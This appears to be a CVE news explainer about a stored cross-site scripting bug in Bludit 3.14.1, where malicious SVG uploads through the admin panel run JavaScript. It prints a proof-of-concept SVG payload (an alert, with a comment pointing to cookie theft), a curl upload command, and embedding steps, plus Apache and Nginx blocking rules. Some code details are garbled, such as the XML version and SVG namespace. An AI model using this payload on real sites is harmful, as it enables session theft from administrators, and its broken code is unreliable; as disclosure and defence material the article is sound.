CVE CyberSecurity Database News

CVE-2023-34845 - How a File Upload Bug in Bludit v3.14.1 Opens Doors to XSS Attacks

Poster -

In June 2023, a new vulnerability (CVE-2023-34845) was found in Bludit CMS version 3.14.1. This flaw lets cyber attackers upload files through the /admin/new-content endpoint. The catch? Bludit fails to properly check the type of uploaded files. Hackers can upload a malicious SVG (Scalable Vector Graphics) file, which browsers treat as an image—but SVGs can also hold JavaScript. This bug gives attackers a way to run scripts right in the admin's browser, leading to a Stored Cross-Site Scripting (XSS) attack.

Let's break down how this happens, look at some example code, and show why this bug matters.

What’s the Problem?

Many content management systems (CMS) let users and admins upload media like images. But when file types aren’t properly checked, someone could sneak in dangerous code. Here, Bludit v3.14.1 lets anyone with access to the admin panel upload SVG files that actually contain hidden JavaScript.

How the Vulnerability Works

When you upload a file in Bludit through /admin/new-content, the server is supposed to block everything but safe files. But in version 3.14.1, SVGs are treated just like plain images.

SVG is more than just an image—it’s an XML-based file format that browsers render inside web pages. SVGs can include Javascript via the <script> tag, which will run when another user (like an admin) views the infected page.

Attacker logs in as an admin or compromised user.

2. Uploads a malicious SVG file via the /admin/new-content endpoint.
3. When someone views the newly uploaded file, the browser will execute the JavaScript inside the SVG, letting the attacker do anything from steal cookies to redirect users.

Here’s a simple SVG file that pops up an alert message when opened

<?xml version="1." standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
 "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">;
<svg width="100" height="100"
     xmlns="http://www.w3.org/200/svg";
     xmlns:xlink="http://www.w3.org/1999/xlink">;
  <script type="text/javascript">
    alert('XSS by CVE-2023-34845');
    // (Or, steal the admin's cookies/document.cookie here)
  </script>
  <circle cx="50" cy="50" r="40" stroke="green" stroke-width="4" fill="yellow" />
</svg>

> Tip: Modern browsers may restrict SVG script execution depending on context. But if SVG is loaded inline or in certain attributes, scripts can still execute.

2. Upload the File

Login to the Bludit admin dashboard and create a new post (or edit an existing one), then use the upload feature to upload evil.svg.

In the content editor, add the uploaded file. For example

![Malicious SVG](/bl-content/uploads/pages/evil.svg)

Or embed it directly with HTML

<img src="/bl-content/uploads/pages/evil.svg">

4. Trigger the Payload

Once the post is published or previewed, anyone (including the admin) viewing the post will trigger the alert or any other malicious code.

Here's a simple PoC in HTTP using curl

curl -i -X POST -F "file=@evil.svg" \
  -b "BLUDIT-KEY=<YOURSESSIONCOOKIE>" \
  http://your-bludit-site.com/admin/ajax/upload-images

> Replace <YOURSESSIONCOOKIE> with a valid Bludit session token.

Data Theft: Grabbing user input or stored info.

Any attacker with file-upload access (including low-privileged users, if available) can exploit this bug to attack higher-privilege admins anytime those admins view the poisoned content.

References

- NVD Entry for CVE-2023-34845
- Exploit Database PoC
- Bludit Official Website
- OWASP XSS Guide

Patching

Bludit has addressed this problem in later releases by blocking SVG uploads and improving file type checks. If you’re running Bludit 3.14.1, upgrade immediately. Don’t allow SVG files through your own PHP or webserver’s settings.

For Apache (.htaccess)

<FilesMatch "\.(svg)$">
    Order Allow,Deny
    Deny from all
</FilesMatch>

For Nginx

location ~* \.svg$ {
    deny all;
}

Final Thoughts

This bug shows how even trusted file formats like SVG can carry hidden dangers. Always keep your CMS updated, use the principle of least privilege, and disable uploads of anything except truly necessary file types!

Stay safe and audit your file uploads.

*This guide is provided as an educational breakdown of CVE-2023-34845. For responsible disclosure and more in-depth details, see the official references linked above.*

Timeline

Published on: 06/16/2023 04:15:00 UTC
Last modified on: 06/23/2023 18:54:00 UTC